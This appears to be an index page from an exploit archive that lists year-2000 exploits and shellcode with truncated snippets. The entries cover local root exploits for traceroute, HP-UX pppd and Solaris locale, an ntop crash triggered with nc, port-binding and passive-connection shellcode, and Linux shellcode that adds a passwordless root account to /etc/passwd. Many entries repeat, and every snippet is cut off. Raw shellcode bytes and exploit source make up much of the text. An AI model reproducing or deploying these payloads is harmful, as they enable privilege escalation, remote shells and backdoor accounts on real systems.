BFTPd - 'vsprintf()' Format Strings

/ Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer have not been partly removed, altered or modified in any way. The material is the property of security.is. You are allowed to adopt the represented code in your programs,...

Oracle 8.x - cmctl Buffer Overflow

/ source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied command line arguments. The string...

HP-UX 11.0 pppd Stack Buffer Overflow Exploit

Exploit for hp-ux platform in category local exploits ============================================= HP-UX 11.0 pppd Stack Buffer Overflow Exploit ============================================= / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / /...

Oracle 8.x - cmctl Buffer Overflow

Oracle 8.x - cmctl Buffer Overflow / source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied comman...

Solaris/SPARC 2.7 / 7 locale Format String Exploit

Exploit for solaris platform in category local exploits ================================================== Solaris/SPARC 2.7 / 7 locale Format String Exploit ================================================== / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on t...

HP-UX 11.0 - pppd Local Stack Buffer Overflow

HP-UX 11.0 - pppd Local Stack Buffer Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: HP-UX pppd / / Tested...

SolarisSPARC 2.7 7 locale - Format String

SolarisSPARC 2.7 7 locale - Format String / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine...

Solaris/SPARC 2.7 / 7 locale - Format String

/ Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine http://www.phreedom.org 10 Oct 2000 / include include defi...

BSD Passive Connection Shellcode

Exploit for bsd platform in category shellcode ================================ BSD Passive Connection Shellcode ================================ ; Passive Connection Shellcode ; ; Coded by Scrippie - email protected - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades...

solaris/SPARC portbinding shellcode

Exploit for solaris/sparc platform in category shellcode =================================== solaris/SPARC portbinding shellcode =================================== / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0,...

solaris/SPARC portbinding shellcode

solaris/SPARC portbinding shellcode. Shellcode exploit for solarissparc platform / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0, %l7 / "\xee\x23\xbf\xec" / st %l7, %sp - 20 / "\x82\x05\xe0\xd6" / add %l7, 214, %g1...

BSD Passive Connection Shellcode

BSD Passive Connection Shellcode. Shellcode exploit for bsd platform ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and...

traceroute Local Root Exploit

Exploit for linux platform in category local exploits ============================= traceroute Local Root Exploit ============================= / MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the...

LBL Traceroute - Local Privilege Escalation

/ MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the corresponding advisory will be made available at: ftp://maxx.via.ecp.fr/traceroot/ This program is free software; you can redistribute it and/or modif...

Ntop -w remote exploit

Problem: ntop has a stack-based BOF when it's requested too long filename. 2. Tested Version ntop-1.2a1 I only tested this version. 3. Example 1. first run ntop -w 8080 2. run this script $ printf "GET /perl -e 'print "A"x240'rnrn" |nc localhost 8080 3. the ntop goes seg. fault. $ ntop -w 8080...

pine421.txt

/ PINE Exploit 4.21 bTm Proof of Concept: Pine 4.21 There exists a vulnerability in Pine 4.21 involving the portion of code in charge of peroidically checking email when a pine client is open. Run pine in one window, then send an email to the account owning that session. Switch back over and hit...

linux/x86 execve /bin/sh toupper evasion 55 bytes

linux/x86 execve /bin/sh toupper evasion 55 bytes. Shellcode exploit for linx86 platform / Linux/x86 toupper evasion, standard execve /bin/sh used eg. in various imapd exploits. Goes through a loop adding 0x20 to the /bin/sh -= 0x20 string ie. yields /bin/sh after addition. / include char c0de = ...

linux/x86 execve /bin/sh toupper() evasion 55 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 execve /bin/sh toupper evasion 55 bytes =================================================== / Linux/x86 toupper evasion, standard execve /bin/sh used eg. in various imapd exploits...

linux/x86 add user 70 bytes

Exploit for linux/x86 platform in category shellcode =========================== linux/x86 add user 70 bytes =========================== / Linux/x86 Appends the line "z::0:0:::\n" to /etc/passwd. quite old, could be optimized further / include char c0de = / main: / "\xeb\x29" / jmp callz / / star...

linux/x86 add user 70 bytes

linux/x86 add user 70 bytes. Shellcode exploit for linx86 platform / Linux/x86 Appends the line "z::0:0:::\n" to /etc/passwd. quite old, could be optimized further / include char c0de = / main: / "\xeb\x29" / jmp callz / / start: / "\x5e" / popl %esi / "\x29\xc0" / subl %eax, %eax / "\x88\x46\x0b...